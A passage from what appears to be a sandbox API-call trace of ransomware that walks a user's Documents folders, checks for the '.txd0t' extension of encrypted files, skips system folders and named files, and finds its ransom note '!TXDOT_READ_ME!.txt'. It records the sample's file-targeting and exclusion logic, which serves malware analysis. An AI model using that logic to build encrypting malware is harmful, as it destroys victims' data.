returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\JzVy_5xEKQ.xlsx.txd0t" [0129.551] PathFindExtensionW (pszPath="JzVy_5xEKQ.xlsx.txd0t") returned=".txd0t" [0129.551] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.551] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc03379e0, ftCreationTime.dwHighDateTime=0x1d5efd1, ftLastAccessTime.dwLowDateTime=0x7f85f110, ftLastAccessTime.dwHighDateTime=0x1d5ec9e, ftLastWriteTime.dwLowDateTime=0x51a1751f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xbca6, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="M24gnx.pps.txd0t", cAlternateFileName="M24GNX~1.TXD")) returned 1 [0129.551] StrCmpW (psz1="M24gnx.pps.txd0t", psz2=".") returned 1 [0129.551] StrCmpW (psz1="M24gnx.pps.txd0t", psz2="..") returned 1 [0129.551] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.551] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="M24gnx.pps.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\M24gnx.pps.txd0t" [0129.552] PathFindExtensionW (pszPath="M24gnx.pps.txd0t") returned=".txd0t" [0129.552] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.552] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eeea7d0, ftCreationTime.dwHighDateTime=0x1d5e48e, ftLastAccessTime.dwLowDateTime=0xdb33cc00, ftLastAccessTime.dwHighDateTime=0x1d5e1b6, ftLastWriteTime.dwLowDateTime=0x51a3d769, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14790, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="MXMHgMI.ods.txd0t", cAlternateFileName="MXMHGM~1.TXD")) returned 1 [0129.552] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2=".") returned 1 [0129.552] StrCmpW (psz1="MXMHgMI.ods.txd0t", psz2="..") returned 1 [0129.552] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="MXMHgMI.ods.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\MXMHgMI.ods.txd0t" [0129.552] PathFindExtensionW (pszPath="MXMHgMI.ods.txd0t") returned=".txd0t" [0129.552] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.552] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9261d20, ftCreationTime.dwHighDateTime=0x1d5eff2, ftLastAccessTime.dwLowDateTime=0xf3d4d290, ftLastAccessTime.dwHighDateTime=0x1d5e25b, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1fb7, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="Uct9z.odt.txd0t", cAlternateFileName="UCT9ZO~1.TXD")) returned 1 [0129.552] StrCmpW (psz1="Uct9z.odt.txd0t", psz2=".") returned 1 [0129.552] StrCmpW (psz1="Uct9z.odt.txd0t", psz2="..") returned 1 [0129.552] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="Uct9z.odt.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\Uct9z.odt.txd0t" [0129.552] PathFindExtensionW (pszPath="Uct9z.odt.txd0t") returned=".txd0t" [0129.552] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.552] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d75360, ftCreationTime.dwHighDateTime=0x1d5e92c, ftLastAccessTime.dwLowDateTime=0xbf44d190, ftLastAccessTime.dwHighDateTime=0x1d5e0d2, ftLastWriteTime.dwLowDateTime=0x51a639c0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1498f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VcL01ptYXVDK5.rtf.txd0t", cAlternateFileName="VCL01P~1.TXD")) returned 1 [0129.552] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2=".") returned 1 [0129.552] StrCmpW (psz1="VcL01ptYXVDK5.rtf.txd0t", psz2="..") returned 1 [0129.552] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VcL01ptYXVDK5.rtf.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VcL01ptYXVDK5.rtf.txd0t" [0129.552] PathFindExtensionW (pszPath="VcL01ptYXVDK5.rtf.txd0t") returned=".txd0t" [0129.552] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.552] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3daa4410, ftCreationTime.dwHighDateTime=0x1d5ec82, ftLastAccessTime.dwLowDateTime=0x5ea14610, ftLastAccessTime.dwHighDateTime=0x1d5ea92, ftLastWriteTime.dwLowDateTime=0x51a89b43, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa60f, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="VSf1IL-6_DKVGroXOg.docx.txd0t", cAlternateFileName="VSF1IL~1.TXD")) returned 1 [0129.552] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2=".") returned 1 [0129.552] StrCmpW (psz1="VSf1IL-6_DKVGroXOg.docx.txd0t", psz2="..") returned 1 [0129.552] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.552] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.553] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="VSf1IL-6_DKVGroXOg.docx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\VSf1IL-6_DKVGroXOg.docx.txd0t" [0129.553] PathFindExtensionW (pszPath="VSf1IL-6_DKVGroXOg.docx.txd0t") returned=".txd0t" [0129.553] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.553] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d8a610, ftCreationTime.dwHighDateTime=0x1d5ef08, ftLastAccessTime.dwLowDateTime=0xa080e8e0, ftLastAccessTime.dwHighDateTime=0x1d5e125, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x12451, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="w3sXXqR.xlsx.txd0t", cAlternateFileName="W3SXXQ~1.TXD")) returned 1 [0129.553] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2=".") returned 1 [0129.553] StrCmpW (psz1="w3sXXqR.xlsx.txd0t", psz2="..") returned 1 [0129.553] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.553] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.553] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="w3sXXqR.xlsx.txd0t", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\w3sXXqR.xlsx.txd0t" [0129.553] PathFindExtensionW (pszPath="w3sXXqR.xlsx.txd0t") returned=".txd0t" [0129.553] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.553] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 1 [0129.553] StrCmpW (psz1="_HV0qcp0pks", psz2=".") returned 1 [0129.553] StrCmpW (psz1="_HV0qcp0pks", psz2="..") returned 1 [0129.553] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU" [0129.553] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU", psz2="\\", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\" [0129.553] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\", psz2="_HV0qcp0pks", cchMax=1140 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system32\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\system\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\local\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\boot\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\perflogs\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\programdata\\") returned 0x0 [0129.553] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\drivers\\") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\wsus\\") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="crypt_detect") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="cryptolocker") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="ransomware") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\WINDOWS") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.554] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", lpSrch="C:\\Program Files") returned 0x0 [0129.554] GetProcessHeap () returned 0xe30000 [0129.554] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x50c) returned 0x680dae8 [0129.554] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.554] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\*", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*" [0129.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*", lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1930 [0129.554] StrCmpW (psz1=".", psz2=".") returned 0 [0129.554] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.554] StrCmpW (psz1="..", psz2=".") returned 1 [0129.554] StrCmpW (psz1="..", psz2="..") returned 0 [0129.554] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51aafdfc, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.554] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.554] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.554] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0129.554] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0129.554] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt" [0129.555] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.555] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.555] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.555] FindNextFileW (in: hFindFile=0xec1930, lpFindFileData=0x599eb88 | out: lpFindFileData=0x599eb88*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5030a3b0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0x7ca2aee0, ftLastAccessTime.dwHighDateTime=0x1d5ee6d, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3791, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="iTea.pptx.txd0t", cAlternateFileName="ITEAPP~1.TXD")) returned 1 [0129.555] StrCmpW (psz1="iTea.pptx.txd0t", psz2=".") returned 1 [0129.555] StrCmpW (psz1="iTea.pptx.txd0t", psz2="..") returned 1 [0129.555] StrCpyNW (in: psz1=0x680dae8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK 